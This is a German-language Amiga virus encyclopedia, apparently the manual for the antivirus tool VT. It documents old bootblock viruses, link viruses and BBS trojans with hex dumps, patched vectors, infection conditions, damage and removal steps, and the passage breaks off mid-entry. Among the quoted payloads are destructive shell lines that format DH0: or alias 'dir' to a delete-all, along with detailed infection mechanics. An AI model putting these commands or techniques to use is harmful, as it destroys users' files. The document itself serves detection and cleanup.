Es liegen auch zwei Bavarian-BB-Intros vor, die nach meiner Meinung harmlos sind. Lesen Sie bitte in VT.andere-BB nach. - Baltasar-Virus BB SCA-Clone s.u. - BB-MASSACRE File gepackt: 9592 Bytes 20202020 20202070 72657365 6e742069 present i 6e203139 3838203a 201b5b31 6d544845 n 1988 : .[1mTHE 20424f4f 54424c4f 434b204d 41535341 BOOTBLOCK MASSA 43524520 1b5b306d 0a202020 20202020 CRE .[0m....... Bietet install von verschiedenen alten BB-Viren (1988) Bietet install von Timebomb V0.9 (Files) s.u. - BB-Prot BB Virus anderer Name: T.ET.E s.u. - BBS-MAXS-Trojaner Mehrere Files bekannt Programmierung in AMOS Keine Vermehrung Keine verbogenen Vektoren Schaden: Zerstoerung von BBS-Systemen (loescht Files) VT bietet loeschen an Im File ist zu lesen (Filenamen aendern sich teilweise): 00000360 0008533a 4e4f4b49 4c4c0005 ...`..S:NOKILL.. 633a6c68 61000005 633a6c68 61000005 c:lha...c:lha... 633a6469 72000005 633a6469 72000013 c:dir...c:dir... 6262733a 75736572 732f7573 65722e64 bbs:users/user.d 61746100 00136262 733a7573 6572732f ata...bbs:users/ 75736572 2e646174 61000017 6262733a user.data...bbs: 75736572 66696c65 732f7573 65722e64 userfiles/user.d 61746100 00176262 733a7573 65726669 ata...bbs:userfi 6c65732f 75736572 2e646174 61000012 les/user.data... 733a7374 61727475 702d7365 7175656e s:startup-sequen 63650012 733a7374 61727475 702d7365 ce..s:startup-se 7175656e 6365000e 733a7573 65722d73 quence..s:user-s ;...... 70650006 633a7479 70650006 633a636f pe..c:type..c:co 70790006 633a636f 70790013 733a6469 py..c:copy..s:di 72656374 6f72796f 7075732e 63666700 rectoryopus.cfg. 0013733a 64697265 63746f72 796f7075 ..s:directoryopu 732e6366 67000004 6262733a 000e6262 s.cfg...bbs:..bb 733a4352 415a5948 4f525345 003b4341 s:CRAZYHORSE.;CA 4c4c2041 20524541 4c204242 53212054 LL A REAL BBS! T 48452053 5441424c 45204f4e 20303135 HE STABLE ON 015 35342038 39313234 36202044 45415448 54 891246 DEATH 20544f20 4d415853 21000000 00000000 TO MAXS!....... Typ A: Archivname: Spice_Power.lha Filename: SpicePower97 57820 Bytes FileID: ZENGO SPICE POWER MEGAMIX 1997! Typ B: Archivname: Nce-Tri9.lha Filename: Trilobyte!_9.exe 46264 Bytes FileID: ...Trilobyte! #9! Typ C: Archivname: jc_spicegirls.lha Filename: jc-spice.exe 111524 Bytes FileID: Jurasic Cactus Typ D: Archivname: Mpeopledemo.lha (Archiv teilweise defekt) Filename: mpeople.exe FileID: M-PEOPLE SLIDESHOW - BBS-Traveller-Vir. Linkvirusteil Fileverlaengerung: 1536 Bytes Ueberlaeuft 3E8-, 3F0-, 3F1-Hunks usw. Eine Mischung aus Ebola und StrangeAt. Ab KS 2.04 Nicht ResetFest (Am Anfang s.u.) Verbogene Vektoren: LoadSeg, ReadArgs, FindName, FindTask, AddPort, SetFunction Cool, DoIo (abhaengig von Zaehlzelle) Im decodierten LinkTeil ist zu lesen: 54525349 67047000 4e7570ff 4e754eae TRSIg.p.Nup.NuN. feda4e75 53657446 756e6b74 696f6e4d ..NuSetFunktionM 616e6167 65720000 536e6f6f 70446f73 anager..SnoopDos 0000536e 6f6f7044 6f732053 7570706f ..SnoopDos Suppo 72742050 726f6300 56697275 735f4368 rt Proc.Virus_Ch 65636b65 7228ae29 00005669 7275735a ecker(.)..VirusZ 5f494900 07e13de4 07f5e200 07f4ecfd _II...=......... 646f732e 6c696272 61727900 2d3d2820 dos.library.-=( 54686520 42425320 54726176 656c6c65 The BBS Travelle 7220293d 2d00 r )=-. Speicherverankerung: - Suche nach gefaehrlichen Programmen (siehe oben). Falls gefunden, KEIN Einbau im Speicher - Test, ob Loadseg schon von Ebola, StrangeAt. oder dem eigenen Programm verbogen ist. - Verbiegen der Vektoren (siehe oben). - Falls obengenannte Programme spaeter geladen werden, dann keine Vermehrung oder gar Selbst-Entfernung aus dem Speicher (z.B. VirusZ) - Falls VT bis einschl. 2.82 spaeter geladen wird, so ENTFERNT sich das Linkteil selbst aus dem Speicher !!!!. - Falls VT VOR dem Linkteil geladen wurde, koennen mit VT/Tools/Systemtest oder VT/Tools/zeigeVek. die verbogenen Vektoren gefunden werden. Das Teil haette also AUCH mit VT2.82 GEFUNDEN WERDEN KOENNEN !!!!! VT2.83 sollte das Teil jetzt im Speicher finden, anzeigen und abschalten. (egal ob VT vorher oder nachher geladen wird) Vermehrung: Fuer die Vermehrung wird NUR LoadSeg verwendet. Test auf: - $3F3 (ausfuehrbar) und $3E9 (CodeHunk) werden gefunden Hinweis: 3E8-, 3F0-, 3F1-Hunks usw. werden ueberlaufen. - Filename enthaelt nicht v, V, . oder - - File noch nicht von Ebola, StrangeAt. oder dem eigenen Programm verseucht. - File ausfuehrbar - Medium validated und mind. 4 Blocks frei - Medium mind. #6000 Blocks (also keine Disk) - File groesser #2600 und kleiner #290000 Bytes Das Teil linkt sich hinter den ersten Hunk, sucht im Original- Hunk nach $4EAE (jsr) und ersetzt jsr durch $4EBA (jsr(PC)). Das Linkteil wird immer neu codiert in Abhaengigkeit von $DFF006. Die Sprungweite darf nicht groesser als $7FF0 sein. VT2.83 sollte den Linkteil finden und ausbauen koennen. Zerstoerung: Sobald eine Zaehlzelle einen hohen Wert und $DFF006 einen bestimmten Wert enthaelt, wird mit Cool und DoIo eine Zerstoerungsroutine aufgebaut. Trackdisk.device wird NICHT gefordert (also auch HD). Ab Block 0 (auch Rigid) wird in einer Schleife Speichermuell geschrieben. VT2.83 sollte Cool und DoIo finden, StrangeAt.-V. ausgeben und die Vektoren zuruecksetzen. - BBS-Trojan Diese Programme sind haeufig NICHT vermehrungsfaehig. Sie dienen meist als Einbruchswerkzeug in eine Mailbox UND in einigen Programmen ist eine Zerstoerungsroutine eingebaut. Typ A (28.05.93): Das Programm DiskRepair V1.2 wurde verseucht. (BBS-DiskR.-Troj) Verseuchte Laenge: 49336 Bytes Methode: 4EB9-Link Das BBS-Teil wird NACH DiskRepair aufgerufen. Trojan-Teil: Imploder gepackte Laenge : 6472 Bytes Lauffaehig entpackt Laenge: 10244 Bytes oder Das Programm DLog V1.0 wurde verseucht. (BBS-DLog.-Troj) Verseuchte Laenge: gepackt: 15432 Bytes entpackt: 22716 Bytes Methode: 4EB9-Link Das BBS-Teil wird NACH DLog aufgerufen. Das Teil wird NICHT aktiv, falls SnoopDos im Speicher ist. Es wird nach bestimmten Filelaengen gesucht. Im BBS-Teil ist zu lesen: 4ebafd18 4e5d4e75 536e6f6f 70446f73 N...N]NuSnoopDos 00424253 00424253 3a004242 533a0042 .BBS.BBS:.BBS:.B 42530042 42533a00 4242533a 5574696c BS.BBS:.BBS:Util 732f0000 4e55fffc 48e70820 246d0008 s/..NU..H.. $m.. VT bietet an loeschen. ODER: Sie gehen in den Filerequester und schalten mit Link2aus das Trojanteil im File ab. Typ B (06.06.93): Das Programm WhiteBox V8.0 wurde verseucht. Verseuchte Laenge: 34896 Bytes Methode: 4EB9-Link Das BBS-Teil wird VOR WhiteBox aufgerufen. Trojan-Teil: Imploder gepackte Laenge : 6980 Bytes Lauffaehig entpackt Laenge: 11204 Bytes Das Teil wird NICHT aktiv, falls SnoopDos im Speicher ist. Es wird nach bestimmten Filelaengen gesucht. Im BBS-Teil ist zu lesen: 414d492d 45585052 4553535f 52554c45 AMI-EXPRESS_RULE 5a3a0041 4d492d45 58505245 53535f52 Z:.AMI-EXPRESS_R 554c455a 3a626273 2f00 ULEZ:bbs/. ;...... 4ebafe48 60d0536e 6f6f7044 6f730042 N..H`.SnoopDos.B 42530042 42533a00 4242533a 00004e55 BS.BBS:.BBS:..NU VT bietet Ausbau an. vgl. auch LHAV3-BBS-Trojan, Viewtek22-Installer Hinweis: Dieses Trojan-Teil ist auch abgekoppelt und entpackt in Umlauf (18424). Aber mindestens eine Version davon ist NICHT lauffaehig (memory Mangel). Erkennen koennen Sie das Teil, da ein 3EA-Hunk fehlt und dafuer ein 3F0-Hunk mit Sprungmarken auftaucht. Vermutlich ist das Teil reassembliert und danach FALSCH wieder assembliert worden. - BEETHOVEN 22.11.92 File Laenge:2608 immer ab $7EF00 Bret Hawnes Clone KS2.04: ja Kicktag, SumKickData, KickCheckSum, OpenNewLib, $6C Namensbegruendung : siehe bei DisplayAlert (Unterschied zu B.H.) Abhaengig von der Zeit meldet sich das VirusTeil mit DisplayAlert. Die Routine und der Text wird decodiert mit: not.b (a1) eor.b #$27,(a1)+ Da hierbei die intuition.base hardcodiert im RangerRam ($c...) abgelegt wird, wird nicht jeder in den "Genuss" des Textes kom- men. (Ich denke ein Anfaenger war am Werk) 62726172 79000000 00000096 14484559 brary........HEY 20212049 43482042 494e205a 5552dc43 ! ICH BIN ZUR.C 4b202121 21212121 21212100 01007d2d K !!!!!!!!!....- 2d3d3e20 4c554457 49472056 414e2042 -=> LUDWIG VAN B 45455448 4f56454e 203c3d2d 000100aa EETHOVEN <=-.... 46494348 204d4143 4845204d 49434820 FICH MACHE MICH 4a45545a 54204155 46204445 4d200001 JETZT AUF DEM .. 00d75541 4d494741 20425245 49542021 ..UAMIGA BREIT ! 21212120 00010096 69444153 20484945 !!! ....iDAS HIE 52204953 5420dc42 52494745 53204d45 R IST .BRIGES ME 494e204e 45554552 20564952 55530001 IN NEUER VIRUS.. 00967d48 45204845 20484520 48452048 ...HE HE HE HE H 45204845 2048452e 2e2e2e20 20000100 E HE HE.... ... 96875649 454c2053 5041df20 4e4f4348 ..VIEL SPA. NOCH 2e2e2e20 00010096 91502e53 2e204d45 ... .....P.S. ME 494e4520 4d555349 4b205741 52205343 INE MUSIK WAR SC 484549df 45200001 00bea02d 20414245 HEI.E .....- ABE 52204d45 494e4520 56495245 4e205349 R MEINE VIREN SI 4e442047 45494c20 21210001 00e1b453 ND GEIL !!.....S 55434b20 4d592044 49434b20 0001005a UCK MY DICK ...Z c3424954 54452043 4f4d5055 54455220 .BITTE COMPUTER 41555353 4348414c 54454e2e 2e2e2000 AUSSCHALTEN... . startup-sequence verseucht: c0a0e0a0 c00a636c 730a0a00 00000000 ......cls....... ^^^^^^^^^^^^^ Das Virusteil schreibt sich also in die erste Zeile der s.-seq. . Diese Aenderung muessen Sie von Hand mit einem Editor rueckgaengig machen. Das Programm selbst schreibt sich in die Root einer Disk mit $C0A0E0A0C0 (ist sichtbar) Nach 10 Vermehrungen wird bei B.H. eine Format-Routine an- gesprungen. Diese Routine fehlt bei BEETHOVEN. Stattdessen wird die DisplayAlert-Routine angesprungen. - BelsinaFucker 2 Files im guide-Format Sie koennen die Teile nur loeschen Name steht so am Ende der Files Typ1 Laenge: 3221 Bytes 20202020 20222073 79737465 6d202245 " system "E 43484f20 3e3e533a 5368656c 6c2d5374 CHO >>S:Shell-St 61727475 70205255 4e203e4e 494c3a20 artup RUN >NIL: 5359533a 53797374 656d2f46 6f726d61 SYS:System/Forma 74204445 56494345 20444830 3a204e41 t DEVICE DH0: NA 4d452066 55634b45 442e6259 2e62456c ME fUcKED.bY.bEl 53496e41 204e4f49 434f4e53 20227d0a SInA NOICONS "}. Typ2 Laenge: 3186 Bytes 20202020 20222073 79737465 6d202245 " system "E 43484f20 3e3e533a 5368656c 6c2d5374 CHO >>S:Shell-St 61727475 7020416c 69617320 44697220 artup Alias Dir 5359533a 432f4465 6c657465 20233f20 SYS:C/Delete #? 616c6c20 3e4e494c 3a20227d 0a40656e all >NIL: "}.@en - BEOL-Viren siehe oben bei B.E.O.L - BESTIAL-Virus Link dos.open Gefunden an das Prg. border (Torsten Juergeleit) gelinkt. Laenge dann: 7876 Bytes Namensbegruendung: im Speicher und im File ist zu lesen 02e86018 3e204245 53544941 4c204445 ..`.> BESTIAL DE 56415354 4154494f 4e203c20 243c0000 VASTATION < $<.. Anmerkungen: - Es duerfte sich um eine Anfaenger-Programmierung handeln. - Grundlage duerfte das XENO-Virus sein. - Die Decodier-Routine im XENO wurde "uebersehen". - Dafuer kommen jetzt 2 absolute JMP nach $Cxyz vor. Wer da keinen Speicher hat, sieht bei der naechsten Verwendung von dos-Open den GURU B. - Mit etwas Glueck und Absicht gelingt der Link-Vorgang. - Von 20 !!!!! gelinkten Files war KEIN File lauffaehig, das mehr als 5 Hunks hatte. GURU 3, 4 usw. - Die richtige Hunk-Behandlung bereitet Probleme. Mal werden $10 Bytes doppelt geschrieben, bei Hunkanzahl kleiner 3 oder es wird $3E9 verschluckt usw. Und dafuer hab ich 4 Stunden geopfert. - Meine Empfehlung: Leute spielt lieber mit dem Joystick !!! Speichererkennung mit VT : getestet 04.03.93 Fileausbau mit VT : getestet 08.03.93 (VT kann teilweise auch Files reparieren, die im gelinktem Zustand nicht mehr lauffaehig sind.) - BGS9 I (schiebt Orig.Prg. in devs) Bytes 2608 laueft mit KS2.04 !!!!! Anruf 12.05.91: Auf einem A500 ohne Festplatte verschiebt der BGS9 I bei fehlendem devs-Verz. das OrigPrg unsichtbar in das Hauptverzeichnis. KickMem, KickTag, KickCheckSum, OpenWindow PrgTeile verschluesselt mit eori.l #$1AF45869,(a0)+ unsichtbares File in devs: A0A0A0202020A0202020A0 am Ende des Prg.Files ist mit einem Monitor zu sehen: TTV1 beim 4.Reset Textausgabe ueber GraphikRoutine: schwarzer Hintergrund, weisse Schrift A COMPUTER VIRUS IS A DISEASE TERRORISM IS A TRANSGRESSION SOFTWARE PIRACY IS A CRIME THIS IS THE CURE BGS9 BUNDESGRENZSCHUTZ SEKTION 9 SONDERKOMMANDO "EDV" Entfernung: File in devs in OriginalPrg. umbenennen BGSVirusFile loeschen OrigPrg aus devs in entsprechendes Verzeichnis kopieren Hinweis: es wird ein unsichtbares File (Name s.o.) weiterge- geben mit der Laenge #64 und dem Inhalt "Protection file!". Dieses File soll einen BGS9-Befall der Disk verhindern. Clone: 04.03.92 TTV1 durch FUCK ersetzt NAST das Codier-LW wurde wurde geaendert ATARI Das File hat die Laenge #2609 und ist damit NICHT lauffaehig - BGS9 II aehnlich BGS9 I aber File in devs jetzt: A0E0A0202020A0202020A0 Hinweis: $E0 ist ein a mit Akzent Anruf 12.05.91: Auf einem A500 ohne Festplatte verschiebt der BGS9 II bei fehlendem devs-Verz. das OrigPrg in das Hauptverzeichnis. Aenderung im Text: :SOFTWARE' Die Veraenderungen liegen im codierten PrgBereich Im PrgFile TTV1 sichtbar - BGS9 III s.o. Neu: unsichtbarer Filename: devs:A0,0 Entfernung: File in devs in OriginalPrg. umbenennen BGSVirusFile loeschen Original-Prg aus devs in entsprechendes Verzeichnis kopieren. - BGS9-PROTECTOR KEIN Virus, sondern ein Antivirusprogramm !!!!! KEINE verbogenen Vektoren Laenge: 3532 Bytes Im File ist zu lesen: 336d2020 20202020 20202020 20202042 3m B 4753202d 20392020 20205649 52555320 GS - 9 VIRUS 50524f54 4543544f 520a2020 20202020 PROTECTOR. Sucht in df0:devs/ und df0: nach den unsichtbaren BGS9-Files. Laeuft NICHT mit neueren Betriebssystemen. Deshalb sollten Sie das File nicht mehr verwenden und auch nicht weitergeben. Danke - BIED.BB-Virus Bootblock Verbogene Vektoren: KickTag, DoIo Im Speicher immer ab $7F800 Resetfest: Ja Fordert trackdisk.device NICHT Im BB ist decodiert zu lesen: 65207472 69636b79 20424945 442d4249 e tricky BIED-BI 544d4150 2d564952 55532120 20202863 TMAP-VIRUS! (c Der Text wird nie ausgegeben. Schaeden: a: Schreibt einen Virus-BB. Auch auf FFS-Disk, d.h. die Disk- struktur stimmt dann nicht und durch z.B. copy File kann die Disk unbrauchbar werden. Falls Sie also diesen Virus- BB von einer Disk entfernt haben, und dann im Filetest die Meldung "bad Data" erhalten, dann versuchen Sie bitte mit VT einen FFS-BB zu installieren. b: Sucht nach dem Rootblock. Die Routine stimmt nur fuer DD-Disk. Versucht dann den BitMapBlock ($13c) zu ermitteln. Die Routine stimmt nur fuer Blockgroesse 512 Bytes. BitMapBlock $371 vorher: nachher: 000: dfe9b83f 00000000 ...?.... : cff1b85f 00000000 ..._.... ;.... 038: 00000000 0007ffff ........ : 0fffffe0 ffffffff ........ 040: ffffffff 00001fff ........ : ffffffff 00001fff ........ Es werden also im BitMapBlock Diskbloecke als nicht belegt gekennzeichnet. Wenn Sie nun mit copy File auf diese Disk schreiben, besteht die Gefahr, dass Sie Teile von anderen Files ueberschreiben. VT kann die BitMap-Veraenderung NICHT erkennen und damit auch nicht rueckgaengig machen. Versuchen Sie mit copy df0: df1: all zu retten was zu retten ist. - BigBen.BB-Virus Bootblock Name uebernommen. Im BB nicht nachvollziehbar KS40.063: Ja Verbogene Vektoren: Cool, DoIo, ReplyMes, WaitPort, ExecInt5 Schreibt immer DOS0-BB Versucht bei der Anzeige zu taeuschen Virus-BB: 444f5300 a16fe26a 00000370 4e716150 DOS..o.j...pNqaP ^^^^^^^^ "Harmlos"-BB: 444f5300 d14fe26d 00000370 43fa003e DOS..O.m...pC..> ^^^^^^^^ 4e716150 = NOP, bsr.s zu Cool schon verbogen Test 43fa003e = LEA Expansion Bei "Harmlos"-BB wuerde es sich also im einen normalen BB handeln. Der Virusteil im BB wuerde NIE erreicht, da ja der Sprungbefehl ersetzt wurde. Vermehrung: BB Die Vermehrung hat bei mir aufgehoert sobald die Zaehlzelle einen bestimmten Wert erreicht hatte. Verhalten: Es wird beim Booten die System-Uhrzeit (immer neu) ausgegeben. Das Bild steht dabei nicht, sondern scheint durchzulaufen. Dunkler Hintergrund, wechselnde Schriftfarbe (meist hell, nach GURU rot). Inhalt z.B.: 27/11/94 14:41:02 Nach mehreren Vermehrungen rattert bei mir DF0:, wenn eine nicht- schreibgeschuetzte Disk mit Virus-BB eingelegt wird. Wird diese Disk dann schreibgeschuetzt und erneut eingelegt, so erscheint die Uhrzeit. Hinweis: es ist bei Tests MEHRFACH vorgekommen, dass nicht der Virus-BB, sondern der "Harmlos"-BB geschrieben wurde. Der kann sich dann NICHT vermehren (s.o.). Um Verwirrungen zu vermeiden sollten Sie diesen ebenfalls durch einen sauberen BB ersetzen. Danke Den NICHT mehr vermehrungsfaehigen BB sollte VT zum Unterschied als "BigBen.BB (L)" erkennen. - BIG BOSS SCA-Clone nur Text geaendert s.u. - Biochip-Virus siehe bei Nibbler-Virus - BioMechanic-Trojan Varianten nach VT: Name frueher bei VT: IconD Name: Biomechanic. Ist nachvollziehbar, da er bei einigen (nicht bei allen) Varianten im cli oder auf HD ausgegeben wird. keine Vermehrung In Amiga-E geschrieben Zerstoerung: Die Files werden NICHT gekuerzt, aber mindestens fuenf Bytes IM File werden veraendert. Bitte KEINE Gleichsetzung mit COP. COP-Varianten verkuerzen Files und schreiben einen Text hinein !!!!!!!!!! Gruppenbildung: Die Files wurden jeweils bis 3E9-Trojanbeginn ge- kuerzt. Files mit ungefaehr GLEICHER Trojancodelaenge (Ausnahme: Sprungbefehle und Muell zwischen den Prg-Teilen und GLEICHER 5-Bytes-Veraenderungsfolge wurden einem Typ zugeordnet. - Typ-A Der Prg-Code ist bis $E18 gleich (Ausnahme: Labels) leerer Dir-Name: nicht vorhanden schreibt in Files bei mir 0002b9b200 bekannte Filenamen: - IconD 2384 Bytes - hd_install.exe 2576 Bytes - Typ-B Der Prg-Code ist bis $E60 gleich (Ausnahme: Labels) leerer Dir-Name: biomechanic trashed your hd!! schreibt in Files bei mir 0002b37800 bekannte Filenamen: - Embryo-HD_install.exe 6764 Bytes - Mortal-Kombat2-HD_install.exe 5512 Bytes - SensibleGolf-HD_install.exe 4476 Bytes - SWOS-HD_install.exe 9588 Bytes - ViroCop-HD_install.exe 5912 Bytes beide Files auch - MCI-CARDS4-FREE.EXE 5912 Bytes vom Inhalt GENAU gleich - Typ-C Der Prg-Code ist nur im AmigaE-Kopf genau gleich schreibt in Files bei mir 0002b37800 bekannter Filename: - members.exe 8584 Bytes - Typ-D Der Prg-Code ist nur im AmigaE-Kopf genau gleich leerer Dir-Name: biomechanic trashed your hd!! schreibt in Files bei mir 0002b37800 bekannter Filename: - Flake_killer_bio.exe 3264 Bytes - Typ-E Der Prg-Code ist nur im AmigaE-Kopf genau gleich verwendet die 4EB9-Methode schreibt in Files bei mir 0002bab700 bekannter Filename: - lzx_1.20t-Bugfix 67504 Bytes - Typ-F Trojan-Teil jeweils 3208 Bytes verwendet die 4EB9-Methode leerer Dir-Name: biomechanic trashed your hd!! schreibt in Files bei mir 0002E76000 bekannte Filenamen: - DayDream 129652 Bytes - Server 20880 Bytes - FixDiskv2.0 39156 Bytes - VirusZ V1.21 80268 Bytes - Typ-G Trojan-Teil ist bis $1076 gleich (Ausnahme: Labels) verwendet die 4EB9-Methode leerer Dir-Name: biomechanic trashed your hd!! schreibt in Files bei mir 000224FE00 bekannte Filenamen: - introvirus 4428 Bytes - Ami-Hacker 6940 Bytes - Viruschecker V6.59 55428 Bytes - Typ-H Der Unterschied zu Typ A ist zu gross schreibt in Files bei mir 0002b9b200 bekannter Filename: - ORB95 3176 Bytes - Biomech-TypA-Trojan Zerstoerungsfile Der Prg-Code ist bis $E18 gleich (Ausnahme: Spruenge) 5 Bytes werden geschrieben = 00 02 b9 b2 00 enthaelt noch keinen Biomechanic-Text, ist aber von der Programmierung (Amiga-E) aus dieser Gruppe. A4000: ja Laenge gepackt: 2384 Bytes Laenge entpackt: 4188 Bytes KEINE verbogenen Vektoren KEINE Vermehrung VT erkennt NUR das Ausloeserfile !! Filename: IconD Im entpackten File ist zu lesen: 65737366 756c6c79 210a0073 79733a70 essfully!..sys:p 72656673 2f007379 733a6465 76732f00 refs/.sys:devs/. 7379733a 6c2f0073 79733a63 2f007379 sys:l/.sys:c/.sy 733a6c69 62732f00 486f6c64 206f6e20 s:libs/.Hold on 7768696c 65204963 6f6e4465 70746820 while IconDepth 56312e33 20697320 636f6e76 65727469 V1.3 is converti 6e672079 6f757220 69636f6e 73210a00 ng your icons!.. Der Text wird im cli ausgegeben und duerfte der Taeuschung dienen. In Wirklichkeit werden die Unterverzeichnisse von sys: prefs, devs, l, c und libs durchsucht. Ausser in prefs und devs duerften da aber im Normalfall KEINE icons sein. Es werden NICHT alle Files in diesen Verzeichnissen veraendert. Unter-Unterver- zeichnisse (z.B. devs/printers) wurden bei mir NICHT durchsucht. Einige Beispiele: File vorher: File nachher: printer.device 4eb90000 08582200 N....X". : 4eb90000 08582200 N....X". 508f6608 4eb90000 P.f.N... : 0002b9b2 00b90000 ........ ^^^^^^^^ ^^ ^^^^^^^^ ^^ 09ba2200 4a81661e ..".J.f. : 09ba2200 4a81661e ..".J.f. dir 4e954a81 6700000a N.J.g... : 4e954a81 6700000a N.J.g... 42a90014 6000028c B...`... : 0002b9b2 0000028c ........ 22290004 e5894ab0 ")....J. : 22290004 e5894ab0 ")....J. icon.library 28804fef 00106700 (.O...g. : 28804fef 00106700 (.O...g. 00822f2e fff82f14 ../.../. : 00820002 b9b20014 ........ 2f052f02 4e934a80 /./.N.J. : 2f052f02 4e934a80 /./.N.J. Es werden also immer 5 Bytes geschrieben = 00 02 b9 b2 00 . Ein System dabei habe ich nicht gefunden. Die Files sind leider NICHT mehr zu retten. VT erkennt veraenderte Files NICHT, da mir die Gefahr der Fehl- erkennung bei nur fuenf Bytes zu gross ist. Falls Sie Bedenken in Ihrem System haben, weil auf Ihrer Festplatte das Ausloeser- file war, dann probieren Sie einen Filemonitor (z.B. hex). Geben Sie im Suchstring $0002b9b2 ein und untersuchen Sie in den bestimmten Unterverzeichnissen die Files. Es geht schnell. Ich habs mit dem l-Verzeichnis probiert (zerstoert war da z.B. disk- validator). Nachtrag Juni 95: Filename: hd_install.exe (KidCurry Spielname ??) . Ich habe nur das File. Laenge gepackt: 2576 Bytes Laenge entpackt: 8052 Bytes Im File ist zu lesen: 4e5d4e75 b9b2004e 6f742065 6e6f7567 N]Nu...Not enoug 68207370 61636521 0a007379 733a7072 h space!..sys:pr 6566732f 00737973 3a646576 732f0073 efs/.sys:devs/.s 79733a6c 2f007379 733a6c69 62732f00 ys:l/.sys:libs/. 7379733a 632f0057 61697420 7768696c sys:c/.Wait whil 65206368 65636b69 6e672048 44207370 e checking HD sp 6163652e 0a0074ff 4e754e75 4aacfff8 ace...t.NuNuJ... Es wird also ein HD-Install im Cli vorgetaeuscht. In Wirklichkeit werden die obengenannten Dirs durchsucht und bei einigen Files (nicht bei allen), die obengenannten 5 Bytes geschrieben. Loadwb vorher: LoadWB nachher: 0000015a 00000112 ...Z.... : 0000015a 00000112 ...Z.... 0000000a 00000003 ........ : 0002b9b2 00000003 ........ ^^^^^^^^ ^^ ^^^^^^^^ ^^ - Biomech-TypB-Trojaner Der Prg-Code ist bis $E60 gleich (Ausnahme: Spruenge) Die fuenf Bytes : 00 02 b3 78 00 Es sind einige neue Files aufgetaucht, die den Biomech-Code ent- halten. Die Namen lassen vermuten, dass es sich um Installer fuer Spiele auf Festplatte handelt. (Embryo-HD_install.exe, MCI-CARDS4 -FREE.EXE, Mortal-Kombat2-HD_install.exe, SensibleGolf-HD_install .exe, SWOS-HD_install.exe, ViroCop-HD_install.exe) In Wirklichkeit wurde der Biomech-Code an Prg.e aus dem C-Verzeichnis (info, remrad usw.) gelinkt. Die Filelaengen sind natuerlich verschieden. Neu bei diesen Files: - Auf das "veraenderte" Medium wird als leerer Dir-Name geschrie- ben: biomechanic trashed your hd!! - Die fuenf Bytes aendern sich : 00 02 b3 78 00 File vorher: File nachher: 22301800 706c286a "0..pl(j : 22301800 0002b378 "0.....x 01984e95 23410058 ..N.#A.X : 00984e95 23410058 ..N.#A.X oder: 08ac001f 0004205f ...... _ : 08ac001f 0004205f ...... _ 45e8ffe0 294a0030 E...)J.0 : 0002b378 004a0030 ...x.J.0 usw. - Biomech-TypC-Trojaner Der Prg-Code ist nur im AmigaE-Kopf genau gleich Die fuenf Bytes : 00 02 b3 78 00 Filename: members.exe Laenge: 8584 Bytes Da ein Text im Cli ausgegeben wird, MUSS das Teil sofort auf- fallen. Die veraenderten Files werden von VT NICHT erkannt. - Biomech-TypD-Trojaner Der Prg-Code ist nur im AmigaE-Kopf genau gleich Die fuenf Bytes : 00 02 b3 78 00 68030: ja neuer bekannter Filename: - Flake_killer_bio.exe 3264 Bytes gepackt - Flake_killer_bio.exe 5552 Bytes ungepackt Nach FileId ein Biomech. Killer Ablauf: Im cli erfolgt zuerst die Ausgabe: ... catch me if you can - b i o m e c h a n i c - Da MUSS jeder gewarnt sein. Fuehren Sie SOFORT eine Reset aus. Betroffene Verzeichnisse sys:c, sys:libs, sys:l, sys:devs und sys:prefs Die fuenf Bytes aendern sich : 00 02 B3 78 00 File vorher: File nachher: z.B. Addbuffers 22301800 706c286a "0..pl(j : 22301800 0002b378 "0.....x 01984e95 23410058 ..N.#A.X : 00984e95 23410058 ..N.#A.X z.B. Avail 660e2005 d0842f00 f. .../. : 660e2005 0002b378 f. ....x 48790000 002a60c8 Hy...*`. : 00790000 002a60c8 .y...*`. Auf das "veraenderte" Medium wird als leerer Dir-Name geschrie- ben: biomechanic trashed your hd!! - Biomech-TypE-Trojaner Die fuenf Bytes : 00 02 ba b7 00 68030: ja Filename: lzx_1.20t-Bugfix Laenge: 67504 Bytes Mit der 4Eb9-Methode wurden zwei gepackte Files zusammengelinkt. Im entpackten 1.Teil ist zu lesen: 20204927 6d20646f 6e65210a 00313231 I'm done!..121 34393061 633164b9 00313231 34656175 490ac1d..1214eau 3164b900 31323134 3564b900 31323134 1d..12145d..1214 35363731 64b90031 32313462 64b90020 5671d..1214bd.. 20202020 20202020 20202020 20202020 20202020 20202020 54686520 666f7263 The forc 6573206f 66207465 72726f72 2e0a0a00 es of terror.... 20202020 20202020 20202020 20202020 20204269 6f6d6563 68616e69 6320616e Biomechanic an 6420432e 4f2e5020 776f726c 6420746f d C.O.P world to 75722039 352e0a0a 00202020 2020204a ur 95.... J 75737420 77726974 696e6720 6f766572 ust writing over 20736f6d 65206669 6c657320 6973206e some files is n 6f742073 6f20636f 6f6c2e20 496d7072 ot so cool. Impr 6f766520 74686520 636f6465 210a0a00 ove the code!... 20202020 20202020 20204d65 73736167 Messag 6520746f 20432e4f 2e502120 436f6f6c e to C.O.P! Cool 20776f72 6b2c2062 7574206d 616b6520 work, but make 6d6f7265 20636f6f 6c657220 74726f6a more cooler troj 616e732e 0a002020 20202020 20202020 ans... 20204c65 616e2062 61636b20 616e6420 Lean back and 6c697374 656e2074 6f207468 6520736f listen to the so 756e6420 6f662061 20777269 74696e67 und of a writing 2048442e 0a0a000a 20202020 20202020 HD..... 20202042 696f6d65 6368616e 69632064 Biomechanic d 69642069 74206167 61696e20 77697468 id it again with 2061206e 65772073 6d617274 65722074 a new smarter t 726f6a61 6e210a00 rojan!. Ablauf: Im cli erfolgt eine Textausgabe (The forces.... trojan!) Wenn Sie das sehen, machen Sie bitte SOFORT einen Reset. Betroffene Verzeichnisse sys:c, sys:libs, sys:l, sys:devs und sys:prefs (hier noch codiert, vgl. 1214bd s.o.) Die fuenf Bytes aendern sich : 00 02 ba b7 00 File vorher: File nachher: z.B. Addbuffers 22301800 706c286a "0..pl(j : 22301800 0002bab7 "0...... 01984e95 23410058 ..N.#A.X : 00984e95 23410058 ..N.#A.X oder z.B. Avail 660e2005 d0842f00 f. .../. : 660e2005 0002bab7 f. ..... 48790000 002a60c8 Hy...*`. : 00790000 002a60c8 .y...*`. Am Schluss erfolgt im cli die Ausgabe: I'm done! (s.o.) Bei Testverseuchungen habe ich immer wieder mal den GURU gesehen. - Biomech-TypF-Trojaner (vgl. auch Typ B) Die fuenf Bytes : 00 02 E7 60 00 68030: ja Bekannte Filenamen: - DayDream 129652 Bytes - Server 20880 Bytes - FixDiskv2.0 39156 Bytes - VirusZ V1.21 80268 Bytes Mit der 4Eb9-Methode wurden zwei Files zusammengelinkt. Laenge 